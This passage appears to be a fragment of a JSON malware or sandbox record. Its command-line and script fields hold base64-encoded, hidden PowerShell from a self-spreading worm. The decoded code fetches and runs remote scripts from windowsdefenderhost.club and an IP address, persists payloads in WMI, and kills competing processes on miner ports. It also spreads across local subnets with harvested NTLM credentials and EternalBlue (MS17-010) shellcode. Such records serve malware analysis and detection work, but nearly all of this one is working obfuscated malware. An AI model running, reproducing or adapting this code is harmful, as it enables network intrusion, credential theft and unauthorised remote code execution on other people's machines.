bgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AU